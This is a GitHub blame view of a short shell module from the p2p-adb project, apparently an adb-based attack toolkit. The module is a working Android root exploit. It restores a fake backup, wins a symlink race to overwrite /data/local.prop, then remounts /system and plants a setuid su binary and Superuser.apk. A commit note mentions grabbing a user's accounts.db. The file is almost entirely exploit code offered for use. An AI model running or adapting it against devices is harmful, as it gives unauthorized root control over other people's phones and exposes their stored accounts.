Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Newer
Older
100644 29 lines (23 sloc) 0.813 kb
c362907 @kosborn Added new adb restore race condition root exploit by Bin4ry:
authored
1 # p2p-adb
2 # https://github.com/kosborn/p2p-adb/
3 # @theKos
4 # kyle@kyleosborn.com
5
6 # This vulnerability discovered here:
7 # http://forum.xda-developers.com/showthread.php?t=1886460
8 # By Bin4ry
9
10
516372b @kosborn pushed functions update.
authored
11 adb restore modules/extras/fakebackup.ab
c362907 @kosborn Added new adb restore race condition root exploit by Bin4ry:
authored
12
13 command "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99 2>/dev/null; do :; done; echo 'Overwrote local.prop!';"
14
546398b @kosborn Fixed issue #2 by Hackrylix. Now gets JB user's accounts.db
authored
15 if command "cat /data/local.prop"
c362907 @kosborn Added new adb restore race condition root exploit by Bin4ry:
authored
16 then echo "Succesfully rooted!"
17 echo "Requires a reboot..."
546398b @kosborn Fixed issue #2 by Hackrylix. Now gets JB user's accounts.db
authored
18 adb reboot
19 sleep 2
20 adb wait-for-device
21 command "mount -o rw,remount /system"
22 adb push includes/su-static /system/xbin/su
23 command "/data/local/tmp/busybox chown 0:0 /system/xbin/su"
24 command "/data/local/tmp/busybox chmod 6777 /system/xbin/su"
25 adb push includes/Superuser.apk /system/app/
26 command "rm /data/local.prop"
27 adb reboot
c362907 @kosborn Added new adb restore race condition root exploit by Bin4ry:
authored
28 fi
Something went wrong with that request. Please try again.